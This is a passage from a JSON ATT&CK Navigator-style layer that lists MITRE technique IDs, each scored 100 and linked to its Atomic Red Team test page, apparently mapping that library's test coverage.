enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552